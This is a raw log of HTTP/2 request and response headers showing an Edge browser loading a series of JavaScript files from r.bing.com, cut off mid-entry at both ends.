nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/cfKt7bw67nxWZkkgOIRReDE3rQI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD1DC12F478770
content-length: 1301
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: wHo5MKy9/uYqMA18Fd80/A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c29dc5cc-301e-0074-11e3-4f6cd6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.2f367a5c.1734384147.3969fb4
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=97531
expires: Sat, 01 Feb 2025 01:09:19 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e736
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/co2z1JDFb7enoIoCaLuo-NbJJjE.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5FBB9234C6
content-length: 395
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: bJNwzHWywBuWP28bX2mBGQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5fa04812-b01e-002a-02f0-159fd5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=300209
expires: Mon, 03 Feb 2025 09:27:17 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e737
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/K3hC1_cQXGFr6cxRJVWYpzZJaAM.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C3132785D7
content-length: 5065
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: zen1RFa4GLG9w/XJIRfohw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4527fc94-701e-001e-76de-1a307d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=129941
expires: Sat, 01 Feb 2025 10:09:29 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e738
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/n23ANye7L3wtUcgKxoGHb7_ezc4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C29C4714A6
content-length: 64359
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: yBOhuH8WUdZCzcrV/Ken2A==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1f3ed3c1-401e-0059-09df-1aef16000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.266d1002.1728543050.2271765d
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=51100
expires: Fri, 31 Jan 2025 12:15:28 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e739
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/DmYomXZ0p9--syG1mm6CnQwvRHg.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xG6fbewJe5QySFo2l1JDAQ==
last-modified: Sun, 26 Jan 2025 12:22:14 GMT
etag: 0x8DD3E041136A899
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d3b4d89f-f01e-000f-4196-700766000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
akamai-grn: 0.9d221002.1737970650.5d822d7
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
cache-control: public, no-transform, max-age=124136
expires: Sat, 01 Feb 2025 08:32:44 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e731
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/2VYJBWEs9lbV3Q50EXL7TNnGBog.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DD1D89AF04AAB6
content-length: 69606
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: ad+ATQX4spqIJ4t9WC3SeQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 47eff3ad-c01e-0025-7ee1-4f7223000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=317102
expires: Mon, 03 Feb 2025 14:08:50 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e73a
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/lLk8XmbdNzzlnPRzVzDhaF9yjqw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC65D005C0E0
content-length: 430
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: l5PXwpOyUFdqY44wmnrCag==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 40cc99ac-b01e-0065-5971-155bcd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=44077
expires: Fri, 31 Jan 2025 10:18:25 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e73b
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/Gyuq2bqitqDJM0BeAkbKXGlQXNw.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5F1663B480
content-length: 714
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: wQmZQwuzNQKGWvk013IgpA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6610645e-101e-002c-1bc2-1768ad000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=128165
expires: Sat, 01 Feb 2025 09:39:53 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e73c
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/n21aGRCN5EKHB3qObygw029dyNU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC66220B7293
content-length: 806
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: hRrTe9xFPcEQGLGPgVvjhw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3ed5921b-601e-0028-650e-169d2f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=338176
expires: Mon, 03 Feb 2025 20:00:04 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e73d
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/8CgcSSLayxEVUBf0swP_bQGMId8.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5D2377F40E
akamai-grn: 0.5eba1302.1737705723.bc898373
content-length: 156
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: 0ApKmxnWdlgJ/r3VvxbmFQ==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5e75869c-d01e-005c-6a23-1b1b69000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=168454
expires: Sat, 01 Feb 2025 20:51:22 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e73e
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/V_fBQ_iVmAgE_Ta_T-6BNXc0ZY4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC6241BA29EA
akamai-grn: 0.2d367a5c.1737919415.2c7e5e21
content-length: 368
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: xl2SFLZCQEcsZUNAUSfMmA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c72e3555-d01e-0057-4e3d-16031d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=88165
expires: Fri, 31 Jan 2025 22:33:13 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e73f
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/9xGNA8UskvA9WHF58zbLOHZ5HvI.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC5D86C3D99C
akamai-grn: 0.c68f655f.1736873620.206a4b97
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 308
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: rimZQyGjXssDEnuSlgMaJA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 52c65f3b-c01e-0007-0c4e-181c15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=148411
expires: Sat, 01 Feb 2025 15:17:19 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e740
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/_2I169N92jVtSc_VEsV0nma5sRY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC63331FF483
content-length: 312
content-type: text/javascript; charset=utf-8
content-encoding: br
content-md5: Ij6CMW7d9STrT+a4Nf7dFA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b58b846c-901e-001f-45b8-163180000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
cache-control: public, no-transform, max-age=169403
expires: Sat, 01 Feb 2025 21:07:11 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e741
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/gKwIRAF4fg7noG1zyeUz8x3Jdhc.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC64B5831289
akamai-grn: 0.ce8f655f.1734111790.23a5829
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-type: text/javascript; charset=utf-8
content-md5: rSmdN6tN5TS/1yEQ8Z6pNA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 7b418c73-801e-0022-3518-1684a6000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 507
cache-control: public, no-transform, max-age=176887
expires: Sat, 01 Feb 2025 23:11:55 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e742
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/zL4sntecq0RmP6dobtS9Rd5WRvU.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCE8C34C6E86D0
akamai-grn: 0.4c1a1202.1735112277.cd568e8c
content-type: text/javascript; charset=utf-8
content-md5: 5WRb79OLEOB99g79FkaKhA==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: f66e2ec1-f01e-0004-15fe-1a1f12000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 1541
vary: Accept-Encoding
cache-control: public, no-transform, max-age=84418
expires: Fri, 31 Jan 2025 21:30:46 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e743
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rp/psgXZvzYJMEW2ydikIk493Va1d4.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCDC66CA2704F8
content-type: text/javascript; charset=utf-8
content-md5: cbryIH17LuJqgju0sWrerw==
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 35b61dc9-601e-006c-20ac-164143000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-allow-origin: *
content-encoding: gzip
content-length: 660
cache-control: public, no-transform, max-age=303278
expires: Mon, 03 Feb 2025 10:18:26 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
vary: Accept-Encoding
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e744
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
-
Remote address:88.221.135.48:443RequestGET /rs/6r/x5/nj/nt6a1ZR520utsLoZmSYgwxdOPgI.js?or=w HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-type: application/x-javascript; charset=utf-8
server: Kestrel
access-control-allow-headers: *
access-control-allow-origin: *
content-encoding: br
last-modified: Mon, 23 Sep 2024 23:58:56 GMT
x-eventid: 6798aa816781423b80ecf1594a059de2
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
x-as-instrumentationoptions: AppServerLoggingMaster=1
x-as-machinename: DUBEEAP0000E13E
x-as-suppresssetcookie: 1
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-r3hBK1obDrTvDukdrROYgDnTCGVj75IWAKcoVB8AgAQ='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
cache-control: public, max-age=215675
expires: Sun, 02 Feb 2025 09:58:23 GMT
date: Thu, 30 Jan 2025 22:03:48 GMT
alt-svc: h3=":443"; ma=93600
akamai-grn: 0.2e367a5c.1738274628.f6e745
timing-allow-origin: *
-
Remote address:88.221.135.48:443RequestGET /rp/5L3iD467J3iJWEPwIjxlK0MMDpY.br.js HTTP/2.0
host: r.bing.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
etag: 0x8DCEC884215D06E
content-length: 772
content-type: text/javascript; charset=utf-8
content-encoding: br
